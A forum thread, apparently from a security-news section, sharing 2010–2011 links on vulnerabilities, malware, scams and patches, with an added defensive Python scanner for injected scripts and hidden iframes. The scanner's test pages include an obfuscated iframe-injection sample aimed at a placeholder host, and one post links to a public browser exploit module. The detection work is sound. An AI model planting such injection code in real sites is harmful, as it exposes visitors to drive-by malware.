https://threatpost.com/en_us/blogs/major-ad-networks-found-serving-malicious-ads-121210
-
They are somewhat slow off the mark with this 'news'; avast had an article in the blogs months ago (like February, almost 10 months ago) about ads poisoning.
http://blog.avast.com/2010/02/18/ads-poisoning-%E2%80%93-jsprontexi/
-
The Internet Goes to War
If you weren’t paying attention recently, the Internet has gone to war.
http://asert.arbornetworks.com/2010/12/the-internet-goes-to-war/
-
The Internet Goes to War
If you weren’t paying attention recently, the Internet has gone to war.
http://asert.arbornetworks.com/2010/12/the-internet-goes-to-war/
Wikileaks sure shook up the Internet.
-
Over 500 patches for SAP
http://www.h-online.com/security/news/item/Over-500-patches-for-SAP-1153061.html
-
Next Tuesday Microsoft to finally fix IE vulnerability
One IE vulnerability not fixed
http://www.vupen.com/english/advisories/2010/3156
-
Critical vulnerability in Internet Explorer - no available update (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/129567/en
Two critical updates for Microsoft systems in December 2010
http://www.norman.com/security_center/security_center_archive/2010/133179/en
-
Critical vulnerability in Internet Explorer - no available update (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/129567/en
Update 2010-12-15
Microsoft has published an update that solves this issue.
More information in Microsoft Security Bulletin MS10-090 (http://www.microsoft.com/technet/security/bulletin/MS10-090.mspx)
It's always nice to post all the information. :)
-
Back door in HP network storage solution
http://www.securityweek.com/backdoor-vulnerability-discovered-hp-msa2000-storage-systems
Update: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?lang=en&cc=us&objectID=c02662287
(HP SUPPORT COMMUNICATION - CUSTOMER ADVISORY)
-
Chaining Bugs to Exploit Browser Plug-Ins
http://threatpost.com/en_us/blogs/chaining-bugs-exploit-browser-plug-ins-121710?utm_source=Newsletter_121710&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=
-
When a smart card can root your computer
http://labs.mwrinfosecurity.com/files/Advisories/mwri_opensc-get-serial-buffer-overflow_2010-12-13.pdf
Patches available: https://www.opensc-project.org/opensc/changeset/4913
-
Twitter, Leaks and Spam
It's quite common to see attackers use hot topics on social networks to force users to click on malicious links. So what would be more interesting these days than using the term “Wikileaks”?
http://www.securelist.com/en/blog/208188050/Twitter_Leaks_and_Spam
-
Google questions results of malicious site protection test
http://www.h-online.com/security/news/item/Google-questions-results-of-malicious-site-protection-test-1155534.html
-
Google questions results of malicious site protection test
http://www.h-online.com/security/news/item/Google-questions-results-of-malicious-site-protection-test-1155534.html
Good one, Thanks!
...The test by NSS Labs was financed by Microsoft.
-
USA: 11.7 MILLION PERSONS REPORTED IDENTITY THEFT VICTIMIZATION IN 2008
http://www.ojp.usdoj.gov/newsroom/pressreleases/2010/BJS11044.htm
-
That's a lot of theft but the info is a little dated since the information
is "water under the bridge" not anything you can do anything about. :)
-
That's a lot of theft but the info is a little dated since the information
is "water under the bridge" not anything you can do anything about. :)
True, Bob.
I don't understand either, why they release the info this late... ;)
# ADVANCE FOR RELEASE AT 10:00 A.M. EST # Thursday, December 16, 2010
-
Off Topic:
I love your Christmas Tree. :)
-
Off Topic:
I love your Christmas Tree. :)
Off Topic:
Can I chop it down on boxing day ;D
-
Off Topic:
I love your Christmas Tree. :)
Thanks Bob..! :)
@Speedy: Well, it won't last till boxing day... ;)
-
Google: New hacked site notifications in search results
http://googlewebmastercentral.blogspot.com/2010/12/new-hacked-site-notifications-in-search.html
-
Virus yearbook 2010 from Panda Security.
http://press.pandasecurity.com/news/virus-yearbook-2010/
-
Google: New hacked site notifications in search results
http://googlewebmastercentral.blogspot.com/2010/12/new-hacked-site-notifications-in-search.html
nice, that was needed and will avoid a waste of time in verifications sometimes.
-
New Facebook scam
Facebook 'Who Has Deleted Ya' Scam Promises Free iPhone, iPad
http://www.huffingtonpost.com/2010/12/20/who-has-deleted-ya-scam-facebook_n_799195.html
ALERT: Don’t Click On Who Has Deleted Ya Application
http://www.allfacebook.com/alert-dont-click-on-who-has-deleted-ya-application-2010-12
-
Back door in ProFTPD FTP server
http://www.h-online.com/open/news/item/Back-door-in-ProFTPD-FTP-server-1146592.html
Phrack hole closed in ProFTPD
http://www.h-online.com/open/news/item/Phrack-hole-closed-in-ProFTPD-1156782.html
-
Microsoft withdraws flawed Outlook update
http://blogs.msdn.com/b/outlook/archive/2010/12/17/issues-with-the-recent-update-for-outlook-2007.aspx
-
SSDD: A New Face on an Established Idea - "Utility Rogues"
http://sunbeltblog.blogspot.com/2010/12/rogues-now-imitate-utilities-rather.html
http://news.cnet.com/8301-27080_3-20025692-245.html
-
SSDD: A New Face on an Established Idea - "Utility Rogues"
http://sunbeltblog.blogspot.com/2010/12/rogues-now-imitate-utilities-rather.html
http://news.cnet.com/8301-27080_3-20025692-245.html
http://techtalk.pcpitstop.com/2010/12/21/malware-minute-malware-now-imitates-pc-utilities/
-
A malicious addition to a Facebook link
(http://www.securelist.com/en/images/pictures/klblog/347.jpg)
http://www.securelist.com/en/blog/345/A_malicious_addition_to_a_Facebook_link
-
One IE vulnerability not fixed
http://www.vupen.com/english/advisories/2010/3156
Exploit published for unpatched Internet Explorer vulnerability
http://www.h-online.com/security/news/item/Exploit-published-for-unpatched-Internet-Explorer-vulnerability-1158348.html
Update: http://www.microsoft.com/technet/security/advisory/2488013.mspx
-
Update: http://www.microsoft.com/technet/security/advisory/2488013.mspx
Key comment: Currently, Microsoft is unaware of any active exploitation of this vulnerability.
-
Update: http://www.microsoft.com/technet/security/advisory/2488013.mspx
Key comment: Currently, Microsoft is unaware of any active exploitation of this vulnerability.
https://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb
-
https://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb
It can not be displayed ???
-
https://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb
It can not be displayed ???
Try with Firefox... mine is working...
-
It can not be displayed ???
check those kinds of sites (broken/down) here: http://downforeveryoneorjustme.com/
-
Try with Firefox... mine is working...
I won't install Firefox just for that site! ::)
I would rather be sent to Siberia ;D
-
Try with Firefox... mine is working...
this shows yet again how much IE sucks compared to FF
-
Try with Firefox... mine is working...
this shows yet again how much IE sucks compared to FF
Works just fine in IE9 even if it doesn't make Altarir happy :)
-
Asyn, Please don't post the link to exploit code.
-
Update: http://www.microsoft.com/technet/security/advisory/2488013.mspx
Key comment: Currently, Microsoft is unaware of any active exploitation of this vulnerability.
https://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb
VirusTotal
http://www.virustotal.com/file-scan/report.html?id=bd656ad91978de9fa2c59aabb81a6693ea9c1294492693d8b8904e3989c87f95-1293126802
sample sent to avast! ;)
-
Update: http://www.microsoft.com/technet/security/advisory/2488013.mspx
Key comment: Currently, Microsoft is unaware of any active exploitation of this vulnerability.
https://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb
VirusTotal
http://www.virustotal.com/file-scan/report.html?id=bd656ad91978de9fa2c59aabb81a6693ea9c1294492693d8b8904e3989c87f95-1293126802
sample sent to avast! ;)
And what about Firewalls?
They can't stop these exploit attacks?
-
Try with Firefox... mine is working...
this shows yet again how much IE sucks compared to FF
Works just fine in IE9 even if it doesn't make Altarir happy :)
I guess Altarir is familiar with Siberia but not using Windows 7 and using WOT leaves him out in the cold ;)
-
addons.mozilla.org disclosure
http://blog.mozilla.com/security/2010/12/27/addons-mozilla-org-disclosure/
-
addons.mozilla.org disclosure
http://blog.mozilla.com/security/2010/12/27/addons-mozilla-org-disclosure/
I received an email about this directly. This email caused me more concern than the potential issue in the blog article, as it looked like the classic phishing email to try and obtain user info. But the IP addresses in the email proved it did come from Mozilla.
It is so long ago that I signed up to the addons section as normally you don't need to unless the addon was experimental. So for me the info was already redundant.
-
addons.mozilla.org disclosure
http://blog.mozilla.com/security/2010/12/27/addons-mozilla-org-disclosure/
The problem is that if you use the same password there as in other forums... They could cross-link the email with the password.
-
***
A misplaced security notice by malcontent from this link:
http://forum.avast.com/index.php?topic=68471.msg575448#msg575448
http://news.softpedia.com/news/Trojan-Distributed-in-New-Mass-Injection-Attack-via-Java-Downloader-174971.shtml
Security researchers warn that a new mass injection attack is underway directing the visitors of hundreds of websites to a malicious Java applet which downloads a trojan.
According to Denis Sinegubko, the creator of the Unmask Parasites Web scanner, the malicious code is added at the end of HTML pages on compromised websites and takes the form of an obfuscated JavaScript function.
When parsed by the browser, this function adds a rogue IFrame to the HTML document, which loads a new.htm page from aubreyserr.com, medien-verlag.de or yennicq.be.
According to statistics from Google's Safe Browsing service, around 2,000 websites link to these domains, giving a rough estimation of the attack's impact so far.
The page called by the IFrame loads a Hidden.jar applet deceptively titled "Java Update." This is a Java OpenConnection-type downloader whose only purpose is to download and execute a file called host.exe.
The three domains serving the malware are actually legitimate, but their corresponding websites have been compromised.
***
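A defender-side static check for the injection pattern the article describes (a script appended after the page has closed, obfuscated inline JavaScript, hidden or known-bad off-site iframes), written here as an added example; it is not part of the original post and is not Unmask Parasites' own scanner. The blocklist hosts and the three sample pages are constructed placeholders, and the obfuscation markers are an assumed heuristic, not a signature set.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed placeholder hosts standing in for the compromised domains the
# article names; a real deployment would load a current blocklist instead.
SUSPECT_HOSTS = {"bad-host-1.invalid", "bad-host-2.invalid"}

# Calls that obfuscated injected scripts lean on (assumed heuristic, not a signature list).
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromCharCode", "document.write(")
# Long runs of \xNN or %NN escapes are typical of packed payload strings.
ESCAPE_RUN = re.compile(r"(\\x[0-9a-f]{2}){8,}|(%[0-9a-f]{2}){8,}", re.I)


class InjectionScanner(HTMLParser):
    """Collects (kind, detail) findings while parsing one HTML page."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.findings = []
        self.doc_closed = False          # set once </body> or </html> has been seen
        self._in_script = False
        self._script_after_close = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self._in_script = True
            self._script_after_close = self.doc_closed
            self._script_buf = []
        elif tag == "iframe":
            self._check_iframe(attrs)

    def handle_endtag(self, tag):
        if tag in ("body", "html"):
            self.doc_closed = True
        elif tag == "script" and self._in_script:
            self._in_script = False
            self._check_script("".join(self._script_buf))

    def handle_data(self, data):
        # HTMLParser delivers script bodies as raw text through handle_data
        if self._in_script:
            self._script_buf.append(data)

    def _check_script(self, body):
        if self._script_after_close:
            self.findings.append(("script_after_close", body[:40]))
        markers = sum(body.count(m) for m in OBFUSCATION_MARKERS)
        if markers >= 2 or ESCAPE_RUN.search(body):
            self.findings.append(("obfuscated_script", "markers=%d" % markers))

    def _check_iframe(self, attrs):
        host = (urlparse(attrs.get("src", "")).hostname or "").lower()
        style = (attrs.get("style") or "").replace(" ", "").lower()
        hidden = (attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
                  or "display:none" in style or "visibility:hidden" in style)
        if host in SUSPECT_HOSTS:
            self.findings.append(("iframe_known_bad", host))
        elif hidden and host and host != self.page_host:
            self.findings.append(("iframe_hidden_offsite", host))


def scan(html, page_host):
    """Return the list of (kind, detail) findings for one page."""
    scanner = InjectionScanner(page_host.lower())
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample pages (not real captures).
SAMPLE_CLEAN = '<html><body><p>Hi</p><script>console.log("hi")</script></body></html>'

SAMPLE_INJECTED = """<html><body><p>Welcome to our site</p>
<iframe src="https://www.example.com/widget" width="300" height="200"></iframe>
</body></html>
<script>function x(){var s=unescape("%3c%69%66%72%61%6d%65%20%73%72%63");
document.write(s+'="http://bad-host-1.invalid/new.htm" width=1 height=1>');}x();</script>
"""

SAMPLE_HIDDEN_IFRAME = """<html><body><p>News</p>
<iframe src="http://bad-host-2.invalid/new.htm" width="0" height="0" style="visibility:hidden"></iframe>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", SAMPLE_CLEAN), ("injected", SAMPLE_INJECTED),
                       ("hidden iframe", SAMPLE_HIDDEN_IFRAME)):
        print(name, scan(page, "www.example.com"))
```

Note what the first sample shows: the iframe itself is built at run time inside `document.write`, so a static parser never sees an `<iframe>` element; the script-after-close and obfuscation heuristics are what catch it, which is why an appended script block is worth flagging on its own.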
-
http://news.softpedia.com/news/Trojan-Distributed-in-New-Mass-Injection-Attack-via-Java-Downloader-174971.shtml
Security researchers warn that a new mass injection attack is underway directing the visitors of hundreds of websites to a malicious Java applet which downloads a trojan.
Avast seems to detect this according to a 3 day old VirusTotal scan. It detects it as: Other:Malware-gen
http://www.virustotal.com/file-scan/report.html?id=b3aa7d92b97cbbc57b563bfb92204931efc3264612b20c754d948edb1f310b51-1293443980
-
Comodo DACS (Distributed and Collaborative Scanning)
I thought it would be a good idea to put this in the security warnings and notices section, hoping that Avast will put it as soon as possible in the PUP list (I'm serious), and maybe add all Comodo links (forum, blog etc...) to the Network Shield black list. thanks.
-
Comodo DACS (Distributed and Collaborative Scanning)
I thought it would be a good idea to put this in the security warnings and notices section, hoping that Avast will put it as soon as possible in the PUP list (I'm serious), and maybe add all Comodo links (forum, blog etc...) to the Network Shield black list. thanks.
Logos, care to explain why?...............or are you scared of Comodo DACS features?
-
Android mobile malware has botnet-like traits
http://www.pcadvisor.co.uk/news/index.cfm?newsid=3254754
Internet Explorer security flaw that allows hackers to take control of computers
http://www.dailymail.co.uk/sciencetech/article-1341402/Microsoft-warns-Internet-Explorer-bug.html
-
Internet Explorer security flaw that allows hackers to take control of computers
http://www.dailymail.co.uk/sciencetech/article-1341402/Microsoft-warns-Internet-Explorer-bug.html
Key comment: 'We're currently unaware of any attacks trying to use the claimed vulnerability or of customer impact.'
Fear mongers are rampant :'(
-
Hardly fear mongering; is the flaw possible/feasible, etc.? It doesn't matter if they are unaware of any attacks. Being unaware is hardly a glowing testimony that it isn't a problem. If/and when it does come to their knowledge it will be a bit late in the day.
You can hardly call it fear mongering when it is Microsoft doing the fear mongering as you call it.
Microsoft have warned about a flaw on the Internet Explorer browser, that could allow hackers to take control of unprotected computers.
-
Privacy Alert: 10 Biggest Threats of 2010
http://www.pcworld.com/businesscenter/article/212631/privacy_alert_10_biggest_threats_of_2010.html?CID
-
Critical update for WordPress
http://wordpress.org/news/2010/12/3-0-4-update/
-
Hole in VLC Media Player
http://www.videolan.org/security/sa1007.html
-
***
The State Of IT Security In 2011
"Here are 10 key security trends that we see in the upcoming 2011."
http://www.crn.com/slide-shows/security/228800318/it-security-predictions-for-2011.htm
***
-
Targeted attacks against recently addressed Microsoft Office vulnerability
http://blogs.technet.com/b/mmpc/archive/2010/12/29/targeted-attacks-against-recently-addressed-microsoft-office-vulnerability-cve-2010-3333-ms10-087.aspx
-
http://krebsonsecurity.com/2011/01/white-house-ecard-dupes-dot-gov-geeks/
A malware-laced e-mail that spoofed seasons greetings from The White House siphoned gigabytes of sensitive documents from dozens of victims over the holidays, including a number of government employees and contractors who work on cybersecurity matters.
The attack appears to be the latest salvo from ZeuS malware gangs whose activities over the past year have blurred the boundaries between online financial crime and espionage, by stealing both financial data and documents from victim machines.
-
Microsoft Security Advisory (2490606)
Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/2490606.mspx
-
Microsoft Security Advisory (2490606)
Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/2490606.mspx
Key comments: We are not aware of attacks that try to use the reported vulnerability or of customer impact at this time.
Non-Affected Software
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems
Windows Server 2008 R2 for Itanium-based Systems
-
http://www.csoonline.com/article/650614/is-storm-waldec-botnet-part-of-new-year-spam-campaign-
Is Storm/Waldec botnet part of New Year spam campaign?
Researchers with Shadowserver Foundation think they are seeing some new tricks from an old botnet. And it could mean a comeback in 2011
-
http://nakedsecurity.sophos.com/2011/01/04/fake-microsoft-update-spreads-worm/
Fake Microsoft security update spreads Autorun worm
In the current example, they've spammed out an email containing a worm, which even quotes the real name of a senior member of Microsoft's security team - Steve Lipner - to try to fool you into believing it is genuine.
-
Floating point DoS attack
http://www.h-online.com/security/news/item/Floating-point-DoS-attack-1163838.html
-
PandaLabs Annual Report 2010
http://press.pandasecurity.com/wp-content/uploads/2010/05/PandaLabs-Annual-Report-2010.pdf
-
lol it didn't take long:
Researcher breaks security sandbox in Adobe Flash
http://www.theregister.co.uk/2011/01/07/adobe_flash_bypass/
edit: BUT:
An attacker would first need to gain access to the user's system to place a malicious SWF file in a directory on the local machine before being able to trick the user into launching an application that can run the SWF file natively. In the majority of use scenarios, the malicious SWF file could not simply be launched by double-clicking on it; the user would have to manually open the file from within the application itself.
The company's security team has rated the bug "moderate."
... so no need to worry really.
-
Floating point DoS attack
http://www.h-online.com/security/news/item/Floating-point-DoS-attack-1163838.html
PHP 5.3.5 / 5.2.17: Floating-Point bug fixed
http://www.h-online.com/open/news/item/PHP-5-3-5-5-2-17-Floating-Point-bug-fixed-1165104.html
-
Microsoft Tuesday patches omit known vulnerabilities
http://www.h-online.com/security/news/item/Microsoft-Tuesday-patches-omit-known-vulnerabilities-1164865.html
-
PlayStation 3 security fully compromised
http://www.norman.com/security_center/security_center_archive/2011/134142/en-us
-
PlayStation 3 security fully compromised
http://www.norman.com/security_center/security_center_archive/2011/134142/en-us
That's actually pretty cool. Wouldn't mind the ability to throw another OS on my PS3. The thought of making it more of a media center would be nice as well. Guess we'll see what the community brings in the coming months.
-
***
The State Of IT Security In 2011
"Here are 10 key security trends that we see in the upcoming 2011."
http://www.crn.com/slide-shows/security/228800318/it-security-predictions-for-2011.htm
***
Thanks for the link. :)
A lot of very useful information there, especially if you go to some of the sites/companies mentioned in the link.
-
***
You are welcome, Nesivos :)
***
-
Mono developers close security hole
http://www.mono-project.com/Release_Notes_Mono_2.8.2
-
With Autos At CES, Are Vehicle Hacks Far Behind?
http://threatpost.com/en_us/blogs/autos-ces-are-vehicle-hacks-far-behind-010711?utm_source=Newsletter_011011&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=
-
Cloud Computing Used to Hack Wireless Passwords
http://news.idg.no/cw/art.cfm?id=72CD2E1A-1A64-6A71-CE4C3EE52F761AAF
-
Critical vulnerability in Internet Explorer - no available update (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/133646/en-us
-
more facebook malware...
Facebook worm spread via photo album chat lure
http://www.theregister.co.uk/2011/01/10/facebook_worm_photo_chat_scam/
Facebook virus spreads via photo album chat messages
http://nakedsecurity.sophos.com/2011/01/09/facebook-photo-album-chat-messages-spreading-koobface-worm/
-
Critical vulnerability in Internet Explorer - no available update (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/133646/en-us
Right now, there are 5 holes unpatched by MS...
More info here: http://blogs.technet.com/b/srd/archive/2011/01/07/assessing-the-risk-of-public-issues-currently-being-tracked-by-the-msrc.aspx
asyn
-
***
Gawker Password Theft a Wake-Up Call
Analysis: Underestimating your own vulnerability is a recipe for disaster.
The big story was that over the weekend of Dec. 11-12, Gawker admitted in a post on its various sites — which include Deadspin, Fleshbot, Gizmodo, io9, Jalopnik, Jezebel, Kotaku and Lifehacker, as well as Gawker itself — that its central password database had been compromised. It seems that the Gawker IT organization had used the long-obsolete DES to encrypt the password store, had ignored at least a month’s worth of warnings that something fishy was going on, and had let its production servers get about three years behind on kernel patches. In short, the company’s IT crew had utterly failed at its job.
http://www.eweek.com/c/a/Security/Gawker-Password-Theft-a-WakeUp-Call-181361/
***
-
Scam Sites Demanding SMS Payment For Fake Flash, Firefox Downloads
http://threatpost.com/en_us/blogs/scam-sites-demanding-sms-payment-fake-flash-firefox-downloads-011711?utm_source=Newsletter_011711&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=
-
Cyber attacks could create "perfect storm"
http://www.reuters.com/article/idUSTRE70G1IU20110117
-
Top Ten Web Hacking Techniques of 2010 (Official)
http://jeremiahgrossman.blogspot.com/2011/01/top-ten-web-hacking-techniques-of-2010.html
Attacking HTTPS with Cache Injection
Apply to IE 8 & Firefox 3.6
http://www.youtube.com/watch?v=bt0Qh9c59_c
-
F-Secure Wrap-up on Case Stuxnet
By Mikko : http://www.youtube.com/watch?v=gFzadFI7sco (10:51 min)
-
Tor project releases update to close critical hole
https://blog.torproject.org/blog/tor-02128-released-security-patches
-
ICQ can be fed crafted updates
http://www.h-online.com/security/news/item/ICQ-can-be-fed-crafted-updates-1170607.html
-
Rogue Facebook apps can now access your home address and mobile phone number
http://nakedsecurity.sophos.com/2011/01/16/rogue-facebook-apps-access-your-home-address-mobile-phone-number/#idc-cover
Update
Facebook regroups on sharing addresses and mobile numbers
http://nakedsecurity.sophos.com/2011/01/18/facebook-regroups-on-sharing-addresses-and-mobile-numbers/
-
Sybase plugs holes in Application Server
http://www.sybase.com/detail?id=1091057
-
Oracle patches 66 vulnerabilities
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
-
Bot attacks Linux and Mac (and Windows)
http://www.theregister.co.uk/2011/01/19/mac_linux_bot_vulnerabilities/
From the department of cosmic justice comes this gem, spotted by researchers from Symantec: a trojan that targets Windows, Mac, and Linux computers contains gaping security vulnerabilities that allow rival criminal gangs to commandeer the infected machines.
Known as Trojan.Jnanabot, or alternately as OSX/Koobface.A or trojan.osx.boonana.a, the bot made waves in October when researchers discovered its Java-based makeup allowed it to attack Mac and Linux machines, not just Windows PCs as is the case with most malware. Once installed, the trojan components are stored in an invisible folder and use strong encryption to keep communications private.
-
Critical vulnerability in Windows Graphics Rendering Engine - no available update
http://www.norman.com/security_center/security_center_archive/2011/134012/en
Update 2011-01-20
Microsoft has updated its security advisory with information about the fact that the previously published fixit solution only applies for Windows XP and Windows Server 2003.
-
PandaLabs Uncovers Alarming Statistics on Cyber-Crime Black Market
http://press.pandasecurity.com/news/pandalabs-uncovers-alarming-statistics-on-cyber-crime-black-market/
-
Bohu Takes Aim at the Cloud
http://blogs.technet.com/b/mmpc/archive/2011/01/19/bohu-takes-aim-at-the-cloud.aspx
http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=TrojanDropper%3AWin32%2FBohu.A
-
Possible new Twitter worm
http://isc.sans.edu/diary.html?storyid=10297
-
Critical vulnerability in VLC player
http://www.h-online.com/security/news/item/Critical-vulnerability-in-VLC-player-1175195.html
-
Critical vulnerability in Opera web browser
http://www.h-online.com/security/news/item/Critical-vulnerability-in-Opera-web-browser-1175689.html
-
Critical vulnerability in VLC player
http://www.h-online.com/security/news/item/Critical-vulnerability-in-VLC-player-1175195.html
VLC Media Player 1.1.6 fixes critical vulnerabilities
http://git.videolan.org/?p=vlc/vlc-1.1.git;a=tag;h=f8d04ab27701f659102ccdb628abce9aa5dadc2a
http://www.videolan.org/vlc/releases/1.1.6.html
http://www.videolan.org/vlc/
-
Critical vulnerability in VLC player
http://www.h-online.com/security/news/item/Critical-vulnerability-in-VLC-player-1175195.html
VLC Media Player 1.1.6 fixes critical vulnerabilities
http://git.videolan.org/?p=vlc/vlc-1.1.git;a=tag;h=f8d04ab27701f659102ccdb628abce9aa5dadc2a
http://www.videolan.org/vlc/releases/1.1.6.html
http://www.videolan.org/vlc/
Well, that was quickly fixed...
-
Well, that was quickly fixed...
Yes, open source projects are often quicker in fixing errors/problems than others... :)
asyn
-
Cracker offers access to government servers for a fee
http://krebsonsecurity.com/2011/01/ready-for-cyberwar/
http://blog.imperva.com/2011/01/major-websites-govmiledu-are-hacked-and-up-for-sale.html
-
New scam mail in circulation, and this time from Tunisia
A letter from a new friend
http://www.norman.com/security_center/blog/per_olav_forland/134881/en
-
Nothing new here, just another take on the same old Nigerian 412 fraud theme looking for gullible people.
-
Nothing new here, just another take on the same old Nigerian 412 fraud theme looking for gullible people.
Many years ago, I even answered one of these letters and strung the fellow along
for quite a few months. Always left him dangling, hoping that with the next email I'd finally consent
to sending him the small percentage of money he wanted as good faith money so that he would be able to send me my millions. ;D ;D
He never got the good faith money and I never got my millions. :)
-
Nothing new here, just another take on the same old Nigerian 412 fraud theme looking for gullible people.
Many years ago, I even answered one of these letters and strung the fellow along
for quite a few months. Always left him dangling, hoping that with the next email I'd finally consent
to sending him the small percentage of money he wanted as good faith money so that he would be able to send me my millions. ;D ;D
He never got the good faith money and I never got my millions. :)
Yep here is a user guide if some want to have fun ;D
E-mail Scams – Have Fun While Scamming the E-mail Scammers
http://www.suite101.com/content/e-mail-scams--have-fun-while-scamming-the-e-mail-scammers-a326407
and here is one that did it
http://www.cracked.com/article_16234_having-fun-with-419-scammers.html
I like the fake bible quotes he is using ;D
-
Fedora infrastructure hacked
http://lists.fedoraproject.org/pipermail/announce/2011-January/002911.html
-
Kaspersky finds fake antivirus program in ads on ICQ
http://news.cnet.com/8301-27080_3-20029525-245.html
A Kaspersky researcher has discovered a fake antivirus warning linked to ads on ICQ, which is popular in Russia and Eastern Europe.
The ad that showed up in the ICQ window was for a women's clothing company called Charlotte Russe and clicking on the ad directs to the company's Web site, said Roel Schouwenberg, a senior antivirus researcher at Moscow-based Kaspersky.
Around the same time the ad was displayed another pop-up appeared in a new browser from "Antivirus8," that said suspicious activity was detected on the system and it encouraged the user to download the program, which is not a legitimate antivirus product, Schouwenberg told CNET.
The malware attack is interesting for several reasons. The rogue antivirus "scareware" appears without the user doing anything that normally triggers such pop-ups, such as clicking on malicious links in search results, he said. The attack also does not appear to have an exploit included in it; just the social-engineering aspect in which the user is lured into downloading supposed antivirus protection that is totally unnecessary, he added.
-
Facebook blames bug for Zuckerberg 'hacking'
http://www.bbc.co.uk/news/technology-12286377
-
Critical vulnerability in Opera web browser
http://www.h-online.com/security/news/item/Critical-vulnerability-in-Opera-web-browser-1175689.html
Fixed in Opera 11.01
http://www.opera.com/docs/changelogs/windows/1101/
-
http://www.securecomputing.net.au/News/245426,trojan-built-to-disable-cloud-antivirus.aspx
Trojan to disable cloud AV.
-
http://www.securecomputing.net.au/News/245426,trojan-built-to-disable-cloud-antivirus.aspx
Trojan to disable cloud AV.
Hope avast adds signatures for this quickly...
-
http://www.securecomputing.net.au/News/245426,trojan-built-to-disable-cloud-antivirus.aspx
Trojan to disable cloud AV.
Hope avast adds signatures for this quickly...
+1 Or my PC will get killed ;)
-
A more secure Facebook
http://www.norman.com/security_center/blog/per_olav_forland/135128/en
-
SourceForge disables servers after break-in
http://sourceforge.net/blog/sourceforge-net-attack/
http://sourceforge.net/apps/wordpress/sourceforge/2011/01/27/sourceforge-net-attack-update/
-
Hackers turn back the clock with Telnet attacks
http://www.networkworld.com/news/2011/012711-hackers-turn-back-the-clock.html?t51hb
-
Update fixes DoS vulnerability in DHCPv6 server
http://www.isc.org/software/dhcp/advisories/cve-2011-0413
-
Vulnerability in MHTML Could Allow Information Disclosure
http://www.microsoft.com/technet/security/advisory/2501696.mspx
http://blogs.technet.com/b/srd/archive/2011/01/28/more-information-about-the-mhtml-script-injection-vulnerability.aspx
-
SourceForge disables servers after break-in
http://sourceforge.net/blog/sourceforge-net-attack/
http://sourceforge.net/apps/wordpress/sourceforge/2011/01/27/sourceforge-net-attack-update/
More info: http://sourceforge.net/blog/sourceforge-attack-full-report/
-
Opera Multiple Vulnerabilities
http://secunia.com/advisories/43023/
Solution
Update to version 11.01.
-
Serious new flaw found in WINDOWS ::)
News
http://www.bbc.co.uk/news/technology-12325139
Fixit available here
http://support.microsoft.com/kb/2501696
Advisory
http://www.microsoft.com/technet/security/advisory/2501696.mspx
-
Serious new flaw found in WINDOWS ::)
affecting Internet Explorer exclusively. But as I use IE9 off and on now, I applied the temp fix earlier today ;)
-
If this temporary fix is applied, will it be automatically reversed or updated when a permanent patch is installed?
-
A New facbook scam in circulation, this time it is fake facbook security
Facebook Security Spoofed, Used for Phishing
http://blog.trendmicro.com/facebook-security-spoofed-used-for-phishing/
-
there is always someone that takes the bait....
419ers strip lonely heart mum of £80k - Handsome US soldier actually Lad from Lagos
http://www.theregister.co.uk/2011/01/31/419_mum/
-
New critical vulnerability in VLC Media Player
http://www.h-online.com/open/news/item/New-critical-vulnerability-in-VLC-Media-Player-1180905.html
-
A New facbook scam in circulation, this time it is fake facbook security
Facebook Security Spoofed, Used for Phishing
http://blog.trendmicro.com/facebook-security-spoofed-used-for-phishing/
Several misspellings in the "warning notice" should be the tip-off that it's not legit. I'm ignoring your own "facbook" in your first line. ;)
-
I'm ignoring your own "facbook" in your first line.
dam this 10" keyboard :P .....let me see your Norwegian spelling Mike ;D
-
Another "facbook" one ;D ;D
http://community.websense.com/blogs/securitylabs/archive/2011/01/30/quot-fackbook-profile-photos-quot-malware-is-coming.aspx
-
http://www.theregister.co.uk/2011/02/02/waledac_account_compromise/
Researchers have taken a peek inside the recently refurbished Waledac botnet, and what they've found isn't pretty.
Waledac, a successor to the once-formidable Storm botnet, has passwords for almost 500,000 Pop3 email accounts, allowing spam to be sent through SMTP servers, according to findings published on Tuesday by security firm Last Line. By hijacking legitimate email servers, the Waledac gang is able to evade IP-based blacklisting techniques that many spam filters use to weed out junk messages.
What's more, Waledac controllers are in possession of almost 124,000 FTP credentials. The passwords let them run programs that automatically infect the websites with scripts that redirect users to sites that install malware and promote fake pharmaceuticals. Last month, the researchers identified almost 9,500 webpages from 222 sites that carried poisoned links injected by Waledac.
-
I'm ignoring your own "facbook" in your first line.
dam this 10" keyboard :P .....let me see your Norwegian spelling Mike ;D
As you may have heard, a great deal of the U.S. and Canada is/are in the middle of (or recovering from) a major winter storm ... it's the worst spell of wethur in ages. ;D ;D
-
IPcalypse happened: Will the Internet collapse? For $ale, my IPv4 number!!!
